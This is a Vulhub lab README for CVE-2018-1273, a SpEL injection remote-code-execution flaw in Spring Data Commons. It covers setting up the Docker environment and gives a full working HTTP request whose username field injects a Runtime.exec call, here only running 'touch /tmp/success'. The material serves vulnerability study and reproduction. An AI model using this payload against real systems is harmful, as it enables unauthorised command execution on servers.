aaronxu/vulhub
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
main
vulhub/spring/CVE-2018-1273/README.md
Aaron 63285f61aa
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Details
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Details
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Details
Vulhub Docker Image CI / images-test (push) Has been cancelled
Details
first commit
2025-09-06 16:08:15 +08:00

51 lines
2.0 KiB
Markdown
Raw Permalink Blame History

# Spring Data Commons Remote Code Execution (CVE-2018-1273)
[中文版本(Chinese version)](README.zh-cn.md)
Spring Data is an open-source framework designed to simplify database access and support cloud services. Spring Data Commons serves as the foundational framework shared by all sub-projects under Spring Data.
In versions 2.0.5 and earlier of Spring Data Commons, there exists a SpEL (Spring Expression Language) injection vulnerability that allows attackers to inject malicious SpEL expressions to execute arbitrary commands.
Reference links:
- https://pivotal.io/security/cve-2018-1273
- https://xz.aliyun.com/t/2269
- https://mp.weixin.qq.com/s?__biz=MzU0NzYzMzU0Mw==&mid=2247483666&idx=1&sn=91e3b2aab354c55e0677895c02fb068c
## Environment Setup
Execute the following command to start a Web application based on Spring Data Commons 2.0.5:
```
docker compose up -d
```
After a short wait and once the server starts, visit `http://your-ip:8080/users` to see a user registration page.
## Vulnerability Reproduce
Referring to the payload from the reference links, intercept the registration request and modify it to the following:
```
POST /users?page=&size=5 HTTP/1.1
Host: localhost:8080
Connection: keep-alive
Content-Length: 124
Pragma: no-cache
Cache-Control: no-cache
Origin: http://localhost:8080
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://localhost:8080/users?page=0&size=5
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/success")]=&password=&repeatedPassword=
```
Execute `docker compose exec spring bash` to enter the container, and you can see that `/tmp/success` has been successfully created, indicating that the command execution was successful:
![](1.png)
Reference in New Issue View Git Blame Copy Permalink